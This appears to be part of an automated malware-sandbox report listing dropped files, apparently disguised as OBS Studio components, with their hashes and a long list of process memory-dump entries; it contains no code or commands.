b179f50c7f0326f1be4a65c248e6018e0953bf579b878fcb1c1f8661cf83897cb0a828a23adc689cbe36374125abc357a04959380ee8ebb0b745602fc78f064f

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmd
Filesize
186B

MD5
afffe3a76201bab24e3d8d386a350c08

SHA1
52d0648d0a111094106689a98c79feefbce900ec

SHA256
5f3d093e7c36368668ed7350d4e1ab3aab677285505f1b18fc98430c7ef8d3f3

SHA512
4a9c3d2b129e590454dd8e80030b420ceccb03f13e70267bff1733a8cf475c625893859702395aad22f048e03aede5b78a8163f8304e34b64f8733ac19179136

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs
Filesize
67B

MD5
6229084e8a7b939a67a9cb8f385e9f1a

SHA1
1131557d825c526f066e74ad77bbf6d588ce7408

SHA256
33bfc99196fb169f0ff2f8a83e72a5d47cdb01c9fab7abda154c935b08120e3d

SHA512
a635e61fae2cb486865dfbfd57fa0f80e81108004e814bd50a7f7bc81189238a629a21acd75ec34796f14f50e7f9f0c9a19263a3d03e4a65a27eb6e03fa16fb6

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml
Filesize
3KB

MD5
7ff486b05598204237fe9e3ac6703451

SHA1
75e4f1c95179746f7796dbfe39fdfaf6362b0a21

SHA256
31cba67e2887f3e576d0040ab086e84b0596530afca703e4c990b9e402b99b1e

SHA512
41bfe96541eb55b22d329d49b5ae13914ddb5400560bbf02d3f4e207308ed06045f14a8de5c27092b7cc89203dfe140200e72f069b65a44b16afd05393a358a7

Download Submit
C:\tmp\.vbs
Filesize
211B

MD5
f6d7083bea77728d624e8fda51da7965

SHA1
8bfd8154d7c57b94cddd9419ae36ccbcbc3bab97

SHA256
3df3856f21bd818f2c16db064f837c36b647366caf8599bdcf933683f6f8bf99

SHA512
645dab7e20a8f5221ccf66013321abc68cb38dd244b1c92fd128831e89a4089ca86a31857bfb201b5eaec712328c3d1fe558aa133374cf8998cc0af0f9d8ea49

Download Submit
C:\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
C:\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
C:\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
C:\tmp\obs64.exe
Filesize
15.9MB

MD5
315048e1d18f5746ae0417a4278ff3ab

SHA1
c083af385df168dff76f4ad7b6c22acc6314f75f

SHA256
c16c484e87513320b820c9dab9e0bf1eab9d324eee87436cf3b3674fc677fcab

SHA512
2960f7f0fe2a92bf9521360915fd8ec3c1daab0e583f76f973273d62e3dc7c13cfd4dd49025bef86085e81384f25101d0d0d210dd2b321239b8f460b9d2c9468

Download Submit
C:\tmp\obs64.scr
Filesize
15.3MB

MD5
a2e4ea727ac977f1a958d0886f7d354e

SHA1
695705eb4878c240bc957d144d9b9efd71efe2cf

SHA256
d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3

SHA512
a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc

Download Submit
C:\tmp\obs64.scr
Filesize
15.3MB

MD5
a2e4ea727ac977f1a958d0886f7d354e

SHA1
695705eb4878c240bc957d144d9b9efd71efe2cf

SHA256
d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3

SHA512
a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc

Download Submit
C:\tmp\obs64.scr
Filesize
15.3MB

MD5
a2e4ea727ac977f1a958d0886f7d354e

SHA1
695705eb4878c240bc957d144d9b9efd71efe2cf

SHA256
d5451fe798542c6a9c054cca84031c5ca9da9696bd8ddd2381f9da9f0520fbf3

SHA512
a95158fad8cfb85281cf428a19899de75f1a26eb63fcf3398f38d50a26f3104d44f56511e1ee11aacd064e558bf6454afb095073a0298a32e472973d5f3cecdc

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
\tmp\obs32.dll
Filesize
6.6MB

MD5
0fe444048a4000a3bca0da179b50dc6c

SHA1
4aad3c1318e26e1a4adb26e52cba3699492ea1e3

SHA256
a57d81a4e4f3f7c34c0ce5fe1b5e397ff96f857ba6c1b1aef235401f6ffd5261

SHA512
c164d85ae70fb034062ba4b8521205a2e639f9ad54f883839fb60a2c9c772e89326cad4950d08ec1736d8a555e23d27ae88079fdb5caf0758fe87c74738601ab

Download Submit
memory/216-434-0x0000000000000000-mapping.dmp

Download
memory/504-388-0x0000000000000000-mapping.dmp

Download
memory/520-1235-0x0000000000000000-mapping.dmp

Download
memory/752-1034-0x0000000000000000-mapping.dmp

Download
memory/776-1640-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/776-1619-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/776-1623-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/776-1632-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/776-1633-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/776-1593-0x0000000000400000-0x0000000002143000-memory.dmp

Filesize
29.3MB

Download
memory/1084-961-0x0000000000000000-mapping.dmp

Download
memory/1088-1245-0x0000000000000000-mapping.dmp

Download
memory/1172-430-0x0000000000000000-mapping.dmp

Download
memory/1444-1265-0x0000000000000000-mapping.dmp

Download
memory/1504-1244-0x0000000000000000-mapping.dmp

Download
memory/1564-669-0x0000000000000000-mapping.dmp

Download
memory/1584-507-0x0000000000000000-mapping.dmp

Download
memory/1880-254-0x0000000000000000-mapping.dmp

Download
memory/1988-512-0x0000000000000000-mapping.dmp

Download
memory/2064-764-0x0000000000000000-mapping.dmp

Download
memory/2080-1259-0x0000000000000000-mapping.dmp

Download
memory/2080-983-0x0000000000000000-mapping.dmp

Download
memory/2128-497-0x0000000000000000-mapping.dmp

Download
memory/2180-611-0x0000000000000000-mapping.dmp

Download
memory/2188-440-0x0000000000000000-mapping.dmp

Download
memory/2204-806-0x0000000000000000-mapping.dmp

Download
memory/2252-843-0x0000000000000000-mapping.dmp

Download
memory/2512-223-0x0000000000000000-mapping.dmp

Download
memory/2524-508-0x0000000000000000-mapping.dmp

Download
memory/2536-1277-0x0000000000000000-mapping.dmp

Download
memory/2568-1271-0x0000000000000000-mapping.dmp

Download
memory/2612-506-0x0000000000000000-mapping.dmp

Download
memory/2628-451-0x0000000000000000-mapping.dmp

Download
memory/2744-1258-0x0000000000000000-mapping.dmp

Download
memory/2748-452-0x0000000000000000-mapping.dmp

Download
memory/2756-811-0x0000000000000000-mapping.dmp

Download
memory/2796-225-0x0000000000000000-mapping.dmp

Download
memory/2796-1333-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2796-709-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2796-288-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2888-141-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-136-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-151-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-150-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-154-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-149-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-155-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-147-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-148-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-146-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-145-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-119-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-144-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-120-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-143-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-142-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-156-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-140-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-139-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-138-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-137-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-152-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2888-135-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-134-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-133-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-132-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-121-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-131-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-164-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2888-130-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-122-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-129-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-128-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-127-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-244-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/2888-126-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-125-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-124-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/2888-123-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/3240-513-0x0000000000000000-mapping.dmp

Download
memory/3268-701-0x0000000000000000-mapping.dmp

Download
memory/3276-1012-0x0000000000000000-mapping.dmp

Download
memory/3376-511-0x0000000000000000-mapping.dmp

Download
memory/3568-514-0x0000000000000000-mapping.dmp

Download
memory/3700-1295-0x0000000000000000-mapping.dmp

Download
memory/3700-1363-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/3700-1444-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/3836-739-0x0000000000000000-mapping.dmp

Download
memory/3864-1178-0x0000000000000000-mapping.dmp

Download
memory/3936-510-0x0000000000000000-mapping.dmp

Download
memory/3988-1286-0x0000000000000000-mapping.dmp

Download
memory/4008-745-0x0000000000000000-mapping.dmp

Download
memory/4036-1596-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/4036-1508-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/4128-1722-0x0000026BB9BC0000-0x0000026BB9BE2000-memory.dmp

Filesize
136KB

Download
memory/4128-1725-0x0000026BB9DF0000-0x0000026BB9E66000-memory.dmp

Filesize
472KB

Download
memory/4188-1187-0x0000000000000000-mapping.dmp

Download
memory/4232-607-0x0000000000000000-mapping.dmp

Download
memory/4248-293-0x0000000000000000-mapping.dmp

Download
memory/4388-881-0x0000000000000000-mapping.dmp

Download
memory/4560-500-0x0000000000000000-mapping.dmp

Download
memory/4572-919-0x0000000000000000-mapping.dmp

Download
memory/4608-554-0x0000000000000000-mapping.dmp

Download
memory/4640-1055-0x0000000000000000-mapping.dmp

Download
memory/4648-909-0x0000000000000000-mapping.dmp

Download
memory/4676-580-0x0000000000000000-mapping.dmp

Download
memory/4744-1183-0x0000000000000000-mapping.dmp

Download
memory/4756-1181-0x0000000000000000-mapping.dmp

Download
memory/4776-612-0x0000000000000000-mapping.dmp

Download
memory/4864-502-0x0000000000000000-mapping.dmp

Download
memory/4868-185-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-172-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-180-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-186-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-171-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-157-0x0000000000000000-mapping.dmp

Download
memory/4868-183-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-182-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-181-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-159-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-179-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-178-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-177-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-160-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-176-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-161-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-175-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-174-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-173-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-184-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-162-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-170-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-169-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-168-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-166-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-165-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4868-163-0x0000000077E00000-0x0000000077F8E000-memory.dmp

Filesize
1.6MB

Download
memory/4892-1073-0x0000000000000000-mapping.dmp

Download
memory/4924-509-0x0000000000000000-mapping.dmp

Download
memory/4940-1138-0x0000000000000000-mapping.dmp

Download
memory/4952-1107-0x0000000000000000-mapping.dmp

Download
memory/4976-505-0x0000000000000000-mapping.dmp

Download
memory/5008-1687-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/5008-1707-0x0000000011000000-0x0000000011158000-memory.dmp

Filesize
1.3MB

Download
memory/5008-1708-0x0000000003B10000-0x0000000003BB7000-memory.dmp

Filesize
668KB

Download
memory/5008-1709-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/5008-1737-0x0000000003B10000-0x0000000003BB7000-memory.dmp

Filesize
668KB

Download
memory/5064-610-0x0000000000000000-mapping.dmp

Download
memory/5084-855-0x0000000000000000-mapping.dmp

Download